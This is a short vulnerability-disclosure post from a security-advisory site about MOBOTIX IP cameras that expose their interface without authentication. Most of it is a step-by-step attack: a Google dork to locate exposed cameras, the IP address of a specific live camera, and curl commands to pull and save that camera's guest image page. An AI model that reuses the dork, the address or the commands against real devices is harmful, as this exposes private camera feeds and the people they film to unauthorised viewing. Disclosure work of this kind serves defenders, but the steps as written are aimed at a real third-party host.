MOBOTIX IP cameras Unauthenticated access

2025.06.20
Credit: hasanwlip
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-306

# Step 1: Search via Google Dork # Result: http://195.70.120.133/ # Step 2: Visit the IP in a browser # The camera interface loads directly without requiring any authentication. # Step 3: Capture the camera interface content using cURL curl http://195.70.120.133/cgi-bin/guestimage.html # Optional: Save the raw HTML content to a file curl http://195.70.120.133/cgi-bin/guestimage.html --output snap.html

References:

1.
https://www.google.com/search?q=intext:%22%C2%A9+2001-2025+MOBOTIX%22+-site:*.*+-inurl:www
2.
https://www.mobotix.com/en
(Official vendor site) 3. Discovered and reported by hasanwlip


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top